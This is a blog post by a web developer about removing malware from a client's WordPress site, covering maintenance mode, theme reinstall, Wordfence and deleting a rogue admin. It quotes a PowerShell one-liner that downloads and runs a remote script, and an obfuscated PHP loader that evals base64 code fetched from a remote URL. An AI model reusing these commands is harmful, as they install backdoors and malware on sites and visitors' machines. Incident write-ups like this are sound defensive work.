Removing a malware from a WordPress website
Full Stack Developer | HTML,CSS, Javascript, WordPress | @sinapradip
A client messaged me very early morning that their website seems to be struck with virus. People visitng the website would download a malicious file & their antivirus will go crazy defending the virus after that.
Upon a glance, I already saw the virus. It was forcing user to open run command and paste a malicious script from from the clipboard.
A quick google and it says it is a powershell virus. I was confirmed.
A PowerShell virus on a WordPress website likely involves malicious scripts injected into the site's files or database, possibly through a compromised plugin or theme. These scripts can be used to redirect users, deface the site, or install further malware. Security measures like enabling the "execution policy" in PowerShell and using robust security plugins can help mitigate the risk.
How PowerShell is used in WordPress attacks: Compromised Plugins/Themes, Database Injection, File System Injection, Obfuscation, Exploiting PowerShell's Capabilities
What I did to remove the virus:
Removed malicious files
Installed Wordfence WordPress security plugin
Updated WordPress, Plugins, and Themes:
Removed Malicious Backups
Further, I even disabled comments Using Disable Comments plugin & prevent spam using CleanTalk.
And it was done. 👍
Read the mitigation in details below:
First, I put the website in Maintenance mode so that no other people would continue to download the virus. Then I took a backup of website using Updraft Plus backup plugin. I knew I would be taking a infected backup but that is what felt right at that moment.
The powershell command it was executing was
powershell -w h -c "$f=$env:TEMP+'\\'+[guid]::NewGuid()+'.ps1';curl http://XXX.XXX.XXX.XXX/KHK.dof -o $f;powershell -w h -ep Bypass -f $f"
Investigating
Upon one-by-one plugin deactivation, no plugin seems to be a culprit.
But deactivating Astra theme seems to remove the issue. That means theme file was infected.
Upon deleting the theme and reinstalling, the issue seems to be gone. But, my doubt hasn’t vanished yet. I went on further investigation.
I took off the maintenance mode for then and went for manual inspection under file manager.
Suspicious files (wco.php, wgg.php, wgr.php, wp-joc.php, wti.php)
Upon reading the code inside the file, it was indeed a malicius file from an attacker.
Hacker also added a backup admin user just in case. I immediately deleted it.
wco.php
inside wco.php there was a malicious code that fetches base64 script and executes
It was fetching base64 from a URL (http://www.maliciouswebsitename.com/assets/img/jw/fm.txt)
wco.php
khdeff;?php echo eval("\77\76" . base64_decode(file_get_contents("\xxx\xxx\x74\x70\x3a\x2f\57\x77\167\167\x2e\144\151\x65\157\x69\166\153\x2e\143\x6f\x6d\x2f\141\x73\x73\145\x74\163\x2f\x69\155\147\x2f\x6a\x77\x2f\x66\x6d\56\x74\170\164"))); __halt_compiler();?
The content from this script fetched a highly powerful backdoor disguised as File manger
After doing all this, I had a confidence that I removed the virus. But they say “No system is 100% secure”. Hence there is always a mole on my mind after the incident. I made a mind that I would be monitoring the website few days even after the mitigation.
![The WordPress Admin Toolkit [Most used Plugin]](/_next/image?url=https%3A%2F%2Fcdn.hashnode.com%2Fuploads%2Fcovers%2F667fc92d62f46ed5bf5df32f%2F8d21d64f-1308-4682-b30b-2c16cdd73b21.png&w=3840&q=75)
